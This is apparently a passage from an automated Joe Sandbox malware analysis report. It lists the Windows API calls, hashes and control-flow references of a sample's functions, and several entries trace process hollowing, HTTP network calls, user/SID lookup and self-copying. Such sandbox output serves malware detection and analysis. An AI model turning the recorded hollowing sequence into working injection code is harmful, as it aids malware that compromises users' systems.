                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                          • API String ID: 3578986977-3242537097
                                                          • Opcode ID: 8038ce904517a86cc19915752ec10024e25c8660399458d5dfb4b262942b5179
                                                          • Instruction ID: 4c34500da4ad4ee1fa56e892ed89410e69d07d0c6dff6010c16861526dd25476
                                                          • Opcode Fuzzy Hash: 8038ce904517a86cc19915752ec10024e25c8660399458d5dfb4b262942b5179
                                                          • Instruction Fuzzy Hash: C601AC75765311ABEB31AFB4ED0DA5A76D8EB46B51B150422F900D29E0FBB0C9C08F71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00192368: CreateFileW.KERNELBASE(00000000,00000000,?,00192758,?,?,00000000,?,00192758,00000000,0000000C), ref: 00192385
                                                          • GetLastError.KERNEL32 ref: 001927C3
                                                          • __dosmaperr.LIBCMT ref: 001927CA
                                                          • GetFileType.KERNELBASE(00000000), ref: 001927D6
                                                          • GetLastError.KERNEL32 ref: 001927E0
                                                          • __dosmaperr.LIBCMT ref: 001927E9
                                                          • CloseHandle.KERNEL32(00000000), ref: 00192809
                                                          • CloseHandle.KERNEL32(0018D4F0), ref: 00192956
                                                          • GetLastError.KERNEL32 ref: 00192988
                                                          • __dosmaperr.LIBCMT ref: 0019298F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: 09b9a74620760f1c6ea0423479f2eae8c51e3f5cd439e4c4a68f31719f8e0ed8
                                                          • Instruction ID: a7e0daa74076db65fa0163383c36829ad4e7958ba920ea8478217a901008953d
                                                          • Opcode Fuzzy Hash: 09b9a74620760f1c6ea0423479f2eae8c51e3f5cd439e4c4a68f31719f8e0ed8
                                                          • Instruction Fuzzy Hash: 79A10532A04154AFCF19EF68DC91BAE3BE1AB5A324F140159F811AF3A2CB349D56CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 00179C90
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PathTemp
                                                          • String ID:
                                                          • API String ID: 2920410445-0
                                                          • Opcode ID: f7ed4eaf9d271da913040abb991491821bc763d0c9e4be96e95b412f4821efa7
                                                          • Instruction ID: 82df81ab4a64eaf81f4da53c4b1df265ca30b3a623d301975c2de80386f22576
                                                          • Opcode Fuzzy Hash: f7ed4eaf9d271da913040abb991491821bc763d0c9e4be96e95b412f4821efa7
                                                          • Instruction Fuzzy Hash: FAA18FB0A002588BEF24DB24CC547DDB7B5AB55304F9045D8E60D67282DB715FC8CF6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(000003E8), ref: 001742B9
                                                          • SetCurrentDirectoryA.KERNEL32(00000000,5D32641E), ref: 00174364
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentDirectorySleep
                                                          • String ID: runas
                                                          • API String ID: 16921501-4000483414
                                                          • Opcode ID: 29d85a786182366578239b8aaa335b84b256e342ceb04bc712836cc483c0c9b2
                                                          • Instruction ID: 149faa0da7ca45f04c88ba660ab86d5e5f8a8dd5394296229e564deaf63e55c5
                                                          • Opcode Fuzzy Hash: 29d85a786182366578239b8aaa335b84b256e342ceb04bc712836cc483c0c9b2
                                                          • Instruction Fuzzy Hash: 23E12A71A001449BEB08FB78CD867ADBB72EF56314F60825CF415AB3C6DB359B448B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 0017A04D
                                                          • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 0017A068
                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0017A1A5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCopyCreateDirectory
                                                          • String ID:
                                                          • API String ID: 210682061-0
                                                          • Opcode ID: 44c6c4d10d376de3a6fd215531746938623d01c86cea7431af4891a5eebf30d8
                                                          • Instruction ID: 468c96f2918aa3acb6eaa8c354a988e4f01a77672ac63a490003a80888c651a4
                                                          • Opcode Fuzzy Hash: 44c6c4d10d376de3a6fd215531746938623d01c86cea7431af4891a5eebf30d8
                                                          • Instruction Fuzzy Hash: 2E41D5B1A001188BEF14EB28CC9979CB775AF55314FA045D8E60DA72C3DB316BC48F6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00179EB5
                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0017A1A5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CopyModuleName
                                                          • String ID:
                                                          • API String ID: 4108865673-0
                                                          • Opcode ID: 1512e962389bd3692438b842997ffa96aa7154ba35a473728f51e3eb5a0ab927
                                                          • Instruction ID: b67c3ca01ea8d0345545101f5709573d2f7d70939b7dda7b63db2e0ada926fde
                                                          • Opcode Fuzzy Hash: 1512e962389bd3692438b842997ffa96aa7154ba35a473728f51e3eb5a0ab927
                                                          • Instruction Fuzzy Hash: B5C12AB1A001148BEF24EB28CC9579DBB359F91314F9482D8E54DA72C2DB319FC98F66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: ffc54b5fc3c939f69b1d86795911733ef47c381ce59a5bc54a2ac1148f95d5d0
                                                          • Instruction ID: 03bb88866536d5173aa3e8e1cc99b40f128f074f787a5ba0cc4823efb060e6b3
                                                          • Opcode Fuzzy Hash: ffc54b5fc3c939f69b1d86795911733ef47c381ce59a5bc54a2ac1148f95d5d0
                                                          • Instruction Fuzzy Hash: A7E0E522505A1155D61276B97C0166E23829B92734B214326F428C64D0DF304A818FF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00185F53
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::cancel_current_task
                                                          • String ID:
                                                          • API String ID: 118556049-0
                                                          • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                          • Instruction ID: f170c128de9823f8aa0d2d95b118d5dad3dbbf8bc7989f88baf1c15d290cf101
                                                          • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                          • Instruction Fuzzy Hash: 5B31E371A046009BD728BE789C8196EFBAAEF54320B24436EE965C7382D7709F458F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 0017218E
                                                            • Part of subcall function 00188483: RaiseException.KERNEL32(E06D7363,00000001,00000003,0017216C,?,?,?,0017216C,?,001A6D1C), ref: 001884E3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise___std_exception_copy
                                                          • String ID:
                                                          • API String ID: 3109751735-0
                                                          • Opcode ID: fee38084ac33ab21416981971373772d88555ef1f14fb6e05a9b33cc2d43aedb
                                                          • Instruction ID: 3de7d9aea874a26871f5c8f0f5782fd0c901e6f3ae1aac3be54a21c4a34b67c0
                                                          • Opcode Fuzzy Hash: fee38084ac33ab21416981971373772d88555ef1f14fb6e05a9b33cc2d43aedb
                                                          • Instruction Fuzzy Hash: 6801267580420D77CB14FAE8EC419997BACDF10314B648621FA14A7181FBB0EB44CFD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: 02f53fffad1f7b397d43658a05786445c31fa97e6ea7f8e60c36c2d816c2be84
                                                          • Instruction ID: 97dbd7e5cd7e916e921953fcb89b8444b9537b813ba926b81d3841828ff81c64
                                                          • Opcode Fuzzy Hash: 02f53fffad1f7b397d43658a05786445c31fa97e6ea7f8e60c36c2d816c2be84
                                                          • Instruction Fuzzy Hash: 58111871A0420AAFCF09DF98E941D9B7BF5EF49304F054059F805AB251E770EA11CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0018F925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0018E0E6,00000001,00000364,00000006,000000FF,?,?,00188272,?), ref: 0018F966
                                                          • _free.LIBCMT ref: 0018EDC5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          • API ID: AllocateHeap_free

                                                          Control-flow Graph
                                                          control_flow_graph 539 192621-192655 call 18add0 call 18ad30 544 19265c-192671 call 1926af 539->544 545 192657-19265a 539->545 548 192676-192679 544->548 547 19267b-19267f 545->547 549 19268a-19268e 547->549 550 192681-192689 call 18d653 547->550 548->547 550->549
                                                          APIs
                                                          • API ID: _free

                                                          Control-flow Graph
                                                          control_flow_graph 553 18f925-18f930 554 18f93e-18f944 553->554 555 18f932-18f93c 553->555 557 18f95d-18f96e RtlAllocateHeap 554->557 558 18f946-18f947 554->558 555->554 556 18f972-18f97d call 18b7f0 555->556 562 18f97f-18f981 556->562 559 18f949-18f950 call 18ccd1 557->559 560 18f970 557->560 558->557 559->556 566 18f952-18f95b call 18bd47 559->566 560->562 566->556 566->557
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0018E0E6,00000001,00000364,00000006,000000FF,?,?,00188272,?), ref: 0018F966
                                                          • API ID: AllocateHeap

                                                          Control-flow Graph
                                                          control_flow_graph 569 18db3c-18db48 570 18db7a-18db85 call 18b7f0 569->570 571 18db4a-18db4c 569->571 579 18db87-18db89 570->579 572 18db4e-18db4f 571->572 573 18db65-18db76 RtlAllocateHeap 571->573 572->573 575 18db78 573->575 576 18db51-18db58 call 18ccd1 573->576 575->579 576->570 581 18db5a-18db63 call 18bd47 576->581 581->570 581->573
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00188272,?,?,?,?,?,001720C3,?,?), ref: 0018DB6E
                                                          • API ID: AllocateHeap

                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00192758,?,?,00000000,?,00192758,00000000,0000000C), ref: 00192385
                                                          • API ID: CreateFile

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 001738E6
                                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0017394B
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00173964
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0017397F
                                                          • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 001739A3
                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 001739BE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 001739C5
                                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 001739ED
                                                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00173A0E
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00173A5A
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 00173A96
                                                          • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00173AB2
                                                          • ResumeThread.KERNEL32(?,?,?,00000000), ref: 00173ABE
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 00173ACC
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00173AED
                                                          Strings
                                                          • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                          • String ID: $NtUnmapViewOfSection$ntdll.dll

                                                          APIs
                                                          • InternetOpenW.WININET(001A3F6C,00000000,00000000,00000000,00000000), ref: 0017871C
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00178740
                                                          • HttpOpenRequestA.WININET(?,00000000), ref: 0017878A
                                                          • HttpSendRequestA.WININET(?,00000000), ref: 0017884A
                                                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 001788FC
                                                          • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 001789B0
                                                          • InternetCloseHandle.WININET(?), ref: 001789D7
                                                          • InternetCloseHandle.WININET(?), ref: 001789DF
                                                          • InternetCloseHandle.WININET(?), ref: 001789E7
                                                          • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend

                                                          APIs
                                                          • API ID: _free$InformationTimeZone

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00187B12
                                                          • API ID: FeaturePresentProcessor

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00173132
                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00173147
                                                          • HeapAlloc.KERNEL32(00000000), ref: 0017314A
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00173158
                                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0017317B
                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00173186
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00173189
                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00173199
                                                          • HeapAlloc.KERNEL32(00000000), ref: 0017319C
                                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 001731C6
                                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 001731D9
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001732D5
                                                          • HeapFree.KERNEL32(00000000), ref: 001732DE
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001732E3
                                                          • HeapFree.KERNEL32(00000000), ref: 001732E6
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001732ED
                                                          • HeapFree.KERNEL32(00000000), ref: 001732F0
                                                          • LocalFree.KERNEL32(00000000), ref: 001732F5
                                                          • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString

                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 00191705
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 001912BB
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 001912CD
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 001912DF
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 001912F1
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191303
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191315
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191327
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191339
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 0019134B
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 0019135D
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 0019136F
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191381
                                                            • Part of subcall function 0019129E: _free.LIBCMT ref: 00191393
                                                          • _free.LIBCMT ref: 001916FA
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 0019171C
                                                          • _free.LIBCMT ref: 00191731
                                                          • _free.LIBCMT ref: 0019173C
                                                          • _free.LIBCMT ref: 0019175E
                                                          • _free.LIBCMT ref: 00191771
                                                          • _free.LIBCMT ref: 0019177F
                                                          • _free.LIBCMT ref: 0019178A
                                                          • _free.LIBCMT ref: 001917C2
                                                          • _free.LIBCMT ref: 001917C9
                                                          • _free.LIBCMT ref: 001917E6
                                                          • _free.LIBCMT ref: 001917FE
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: f75c1e0e3e474880cd78b6fd3bea38bae0b30d227e3a768090d22062b217b5f6
                                                          • Instruction ID: 64fe9be8bbece1139b09847ab978bb3aec10a7686827d538d84da6aa9ee23ca3
                                                          • Opcode Fuzzy Hash: f75c1e0e3e474880cd78b6fd3bea38bae0b30d227e3a768090d22062b217b5f6
                                                          • Instruction Fuzzy Hash: C6314C35600307AFEF25AEB9E845B5A73E9AF10750F64842AF459D7191EF70AEC0CB24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00188CC2
                                                          • type_info::operator==.LIBVCRUNTIME ref: 00188CE9
                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00188DF5
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00188ED0
                                                          • _UnwindNestedFrames.LIBCMT ref: 00188F57
                                                          • CallUnexpected.LIBVCRUNTIME ref: 00188F72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 2123188842-393685449
                                                          • Opcode ID: 1ad1391190da69a85a35bf28da5e9e2b8ed4de83f6ad3c585741270c3d253052
                                                          • Instruction ID: 32152ed2baec11adf39e76d556fc20a774f80e08bda07b20355c5592db4c82bf
                                                          • Opcode Fuzzy Hash: 1ad1391190da69a85a35bf28da5e9e2b8ed4de83f6ad3c585741270c3d253052
                                                          • Instruction Fuzzy Hash: F7C14B71800209EFCF29FF94D8819AEBBB5BF24310F94455AE815AB252DB31DB51CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0018DE42
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 0018DE4E
                                                          • _free.LIBCMT ref: 0018DE59
                                                          • _free.LIBCMT ref: 0018DE64
                                                          • _free.LIBCMT ref: 0018DE6F
                                                          • _free.LIBCMT ref: 0018DE7A
                                                          • _free.LIBCMT ref: 0018DE85
                                                          • _free.LIBCMT ref: 0018DE90
                                                          • _free.LIBCMT ref: 0018DE9B
                                                          • _free.LIBCMT ref: 0018DEA9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c9eadde83fd202b908992afe5b6e58af79a564afdc35989d0e75a476b1afdf7d
                                                          • Instruction ID: 4b627d99e31cf64fc3c536f42644743640bcfb2a5eba7e326e9b4ba15f12708e
                                                          • Opcode Fuzzy Hash: c9eadde83fd202b908992afe5b6e58af79a564afdc35989d0e75a476b1afdf7d
                                                          • Instruction Fuzzy Hash: A521B67690420DAFCB01EF94D881DDE7BB9BF18740B5081A6F6199B161EB71EB84CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
